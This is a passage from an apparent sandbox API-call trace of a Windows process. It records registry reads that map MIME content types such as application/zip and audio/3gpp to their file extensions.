lpsz=".jnlp", cchLength=0x5 | out: lpsz=".jnlp") returned 0x5 [0104.700] CharLowerBuffW (in: lpsz="application/x-java-jnlp-file", cchLength=0x1c | out: lpsz="application/x-java-jnlp-file") returned 0x1c [0104.700] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.700] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-jtx+xps", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.701] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.702] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".jtx", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.703] CharLowerBuffW (in: lpsz=".jtx", cchLength=0x4 | out: lpsz=".jtx") returned 0x4 [0104.703] CharLowerBuffW (in: lpsz="application/x-jtx+xps", cchLength=0x15 | out: lpsz="application/x-jtx+xps") returned 0x15 [0104.703] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.703] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-latex", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.704] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.704] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".latex", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.705] CharLowerBuffW (in: lpsz=".latex", cchLength=0x6 | out: lpsz=".latex") returned 0x6 [0104.705] CharLowerBuffW (in: lpsz="application/x-latex", cchLength=0x13 | out: lpsz="application/x-latex") returned 0x13 [0104.705] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.705] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-mix-transfer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.706] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.706] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".nix", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.706] CharLowerBuffW (in: lpsz=".nix", cchLength=0x4 | out: lpsz=".nix") returned 0x4 [0104.706] CharLowerBuffW (in: lpsz="application/x-mix-transfer", cchLength=0x1a | out: lpsz="application/x-mix-transfer") returned 0x1a [0104.706] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.706] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-mplayer2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.708] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.708] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".asx", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.708] CharLowerBuffW (in: lpsz=".asx", cchLength=0x4 | out: lpsz=".asx") returned 0x4 [0104.708] CharLowerBuffW (in: lpsz="application/x-mplayer2", cchLength=0x16 | out: lpsz="application/x-mplayer2") returned 0x16 [0104.708] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.709] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-ms-application", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.709] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x1a) returned 0x0 [0104.710] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a4c4c, lpcbData=0x19fc20*=0x1a | out: lpType=0x19fc10*=0x1, lpData=".application", lpcbData=0x19fc20*=0x1a) returned 0x0 [0104.807] CharLowerBuffW (in: lpsz=".application", cchLength=0xc | out: lpsz=".application") returned 0xc [0104.807] CharLowerBuffW (in: lpsz="application/x-ms-application", cchLength=0x1c | out: lpsz="application/x-ms-application") returned 0x1c [0104.807] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.807] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-ms-vsto", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.808] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.809] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".vsto", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.809] CharLowerBuffW (in: lpsz=".vsto", cchLength=0x5 | out: lpsz=".vsto") returned 0x5 [0104.809] CharLowerBuffW (in: lpsz="application/x-ms-vsto", cchLength=0x15 | out: lpsz="application/x-ms-vsto") returned 0x15 [0104.809] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.809] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-ms-wmd", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.811] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.811] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".wmd", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.811] CharLowerBuffW (in: lpsz=".wmd", cchLength=0x4 | out: lpsz=".wmd") returned 0x4 [0104.811] CharLowerBuffW (in: lpsz="application/x-ms-wmd", cchLength=0x14 | out: lpsz="application/x-ms-wmd") returned 0x14 [0104.811] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.811] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-ms-wmz", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.812] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.812] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".wmz", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.813] CharLowerBuffW (in: lpsz=".wmz", cchLength=0x4 | out: lpsz=".wmz") returned 0x4 [0104.813] CharLowerBuffW (in: lpsz="application/x-ms-wmz", cchLength=0x14 | out: lpsz="application/x-ms-wmz") returned 0x14 [0104.813] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.813] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-ms-xbap", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.815] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.815] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xbap", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.816] CharLowerBuffW (in: lpsz=".xbap", cchLength=0x5 | out: lpsz=".xbap") returned 0x5 [0104.816] CharLowerBuffW (in: lpsz="application/x-ms-xbap", cchLength=0x15 | out: lpsz="application/x-ms-xbap") returned 0x15 [0104.816] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.816] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-mswebsite", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.817] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x12) returned 0x0 [0104.818] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x249a684, lpcbData=0x19fc20*=0x12 | out: lpType=0x19fc10*=0x1, lpData=".website", lpcbData=0x19fc20*=0x12) returned 0x0 [0104.818] CharLowerBuffW (in: lpsz=".website", cchLength=0x8 | out: lpsz=".website") returned 0x8 [0104.818] CharLowerBuffW (in: lpsz="application/x-mswebsite", cchLength=0x17 | out: lpsz="application/x-mswebsite") returned 0x17 [0104.818] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.819] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-pkcs12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.819] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.819] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".p12", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.819] CharLowerBuffW (in: lpsz=".p12", cchLength=0x4 | out: lpsz=".p12") returned 0x4 [0104.819] CharLowerBuffW (in: lpsz="application/x-pkcs12", cchLength=0x14 | out: lpsz="application/x-pkcs12") returned 0x14 [0104.819] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.820] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-pkcs7-certificates", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.820] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.821] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".p7b", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.821] CharLowerBuffW (in: lpsz=".p7b", cchLength=0x4 | out: lpsz=".p7b") returned 0x4 [0104.821] CharLowerBuffW (in: lpsz="application/x-pkcs7-certificates", cchLength=0x20 | out: lpsz="application/x-pkcs7-certificates") returned 0x20 [0104.821] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.821] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-pkcs7-certreqresp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.822] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.822] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".p7r", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.823] CharLowerBuffW (in: lpsz=".p7r", cchLength=0x4 | out: lpsz=".p7r") returned 0x4 [0104.823] CharLowerBuffW (in: lpsz="application/x-pkcs7-certreqresp", cchLength=0x1f | out: lpsz="application/x-pkcs7-certreqresp") returned 0x1f [0104.823] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.823] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-shockwave-flash", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.824] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.824] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".swf", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.824] CharLowerBuffW (in: lpsz=".swf", cchLength=0x4 | out: lpsz=".swf") returned 0x4 [0104.825] CharLowerBuffW (in: lpsz="application/x-shockwave-flash", cchLength=0x1d | out: lpsz="application/x-shockwave-flash") returned 0x1d [0104.825] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.825] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-stuffit", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.826] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.826] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".sit", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.827] CharLowerBuffW (in: lpsz=".sit", cchLength=0x4 | out: lpsz=".sit") returned 0x4 [0104.827] CharLowerBuffW (in: lpsz="application/x-stuffit", cchLength=0x15 | out: lpsz="application/x-stuffit") returned 0x15 [0104.827] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.827] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-tar", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.827] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.828] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".tar", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.828] CharLowerBuffW (in: lpsz=".tar", cchLength=0x4 | out: lpsz=".tar") returned 0x4 [0104.828] CharLowerBuffW (in: lpsz="application/x-tar", cchLength=0x11 | out: lpsz="application/x-tar") returned 0x11 [0104.828] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.828] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-troff-man", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.829] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.829] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".man", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.830] CharLowerBuffW (in: lpsz=".man", cchLength=0x4 | out: lpsz=".man") returned 0x4 [0104.830] CharLowerBuffW (in: lpsz="application/x-troff-man", cchLength=0x17 | out: lpsz="application/x-troff-man") returned 0x17 [0104.830] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.830] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-vnd.google.oneclickctrl.9", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.831] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0104.831] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.831] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-vnd.google.update3webcontrol.3", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.832] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0104.833] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.833] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-wmplayer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.833] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.833] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".asx", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.833] CharLowerBuffW (in: lpsz=".asx", cchLength=0x4 | out: lpsz=".asx") returned 0x4 [0104.833] CharLowerBuffW (in: lpsz="application/x-wmplayer", cchLength=0x16 | out: lpsz="application/x-wmplayer") returned 0x16 [0104.834] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.834] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-x509-ca-cert", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.834] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.834] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".cer", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.834] CharLowerBuffW (in: lpsz=".cer", cchLength=0x4 | out: lpsz=".cer") returned 0x4 [0104.834] CharLowerBuffW (in: lpsz="application/x-x509-ca-cert", cchLength=0x1a | out: lpsz="application/x-x509-ca-cert") returned 0x1a [0104.834] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.834] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-zip-compressed", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.835] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.835] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".zip", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.836] CharLowerBuffW (in: lpsz=".zip", cchLength=0x4 | out: lpsz=".zip") returned 0x4 [0104.836] CharLowerBuffW (in: lpsz="application/x-zip-compressed", cchLength=0x1c | out: lpsz="application/x-zip-compressed") returned 0x1c [0104.836] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.836] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/xaml+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.837] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.838] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xaml", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.838] CharLowerBuffW (in: lpsz=".xaml", cchLength=0x5 | out: lpsz=".xaml") returned 0x5 [0104.838] CharLowerBuffW (in: lpsz="application/xaml+xml", cchLength=0x14 | out: lpsz="application/xaml+xml") returned 0x14 [0104.838] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.838] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/xhtml+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.838] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.839] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".xht", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.839] CharLowerBuffW (in: lpsz=".xht", cchLength=0x4 | out: lpsz=".xht") returned 0x4 [0104.839] CharLowerBuffW (in: lpsz="application/xhtml+xml", cchLength=0x15 | out: lpsz="application/xhtml+xml") returned 0x15 [0104.839] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.839] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.840] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.841] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".xml", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.841] CharLowerBuffW (in: lpsz=".xml", cchLength=0x4 | out: lpsz=".xml") returned 0x4 [0104.841] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0104.841] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.841] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/zip", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.842] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.842] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".zip", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.843] CharLowerBuffW (in: lpsz=".zip", cchLength=0x4 | out: lpsz=".zip") returned 0x4 [0104.843] CharLowerBuffW (in: lpsz="application/zip", cchLength=0xf | out: lpsz="application/zip") returned 0xf [0104.843] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.843] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/3gpp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.843] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.843] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".3gp", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.844] CharLowerBuffW (in: lpsz=".3gp", cchLength=0x4 | out: lpsz=".3gp") returned 0x4 [0104.844] CharLowerBuffW (in: lpsz="audio/3gpp", cchLength=0xa | out: lpsz="audio/3gpp") returned 0xa [0104.844] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.844] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/3gpp2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.845] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.845] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".3g2", 